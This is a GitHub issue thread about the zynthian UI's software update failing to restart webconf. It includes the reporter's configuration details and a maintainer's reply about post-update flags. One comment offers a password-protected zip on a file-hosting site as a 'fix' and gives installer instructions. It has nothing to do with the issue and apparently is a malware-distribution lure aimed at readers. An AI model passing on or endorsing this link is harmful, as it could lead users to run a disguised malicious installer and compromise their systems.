### ISSUE TITLE
Update from UI does not restart webconf

### ISSUE THREAD

**Issue by riban-bw** [zynthian/zynthian-issue-tracking#1176]
# Describe the issue
If you update from webconf then the last action is to restart webconf but if you update from zynthian UI, webconf is not updated and hence any changes are not implemented until reboot.
# To Reproduce
## Steps to reproduce the behavior:
1. Go to admin menu
2. Update Software
 ## Expected behaviour
Software updates and webconf is restarted.
## Actual behaviour
Software updates and webconf is not restarted.

# Configuration
## Hardware
```
Raspberry Pi 4 Model B Rev 1.5
Audio: V5 ADAC
Display: MIPI DSI 800x480 (inverted)
Wiring: V5
I2C: MCP23017@0x20, MCP23017@0x21
Profile: v5
```
## System
```
Debian GNU/Linux 12 (bookworm)
Build Date: 2024-02-01
Memory: 34% (1312M/3792M)
SD Card: 95% (26G/29G)
Temperature: 44.8ºC
Overclock: Maximum
```
## MIDI & UI
```
Tuning: 440 Hz
Master Channel: Off
Preload Presets: Off
ZS3 (SubSnapShots): On
Power Save: 10 minutes
Audio Levels on Snapshots: On
```
## Software
```
zyncoder: oram (62626a8) 
zynthian-ui: oram (b42921b)
zynthian-sys: oram (b022220)
zynthian-data: oram (e222e11)
zynthian-webconf: oram (b70f1bc)
```

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jofemodo** [comment]
It depends if a webconf restart is needed/flagged. There are some flags that control post-update actions.
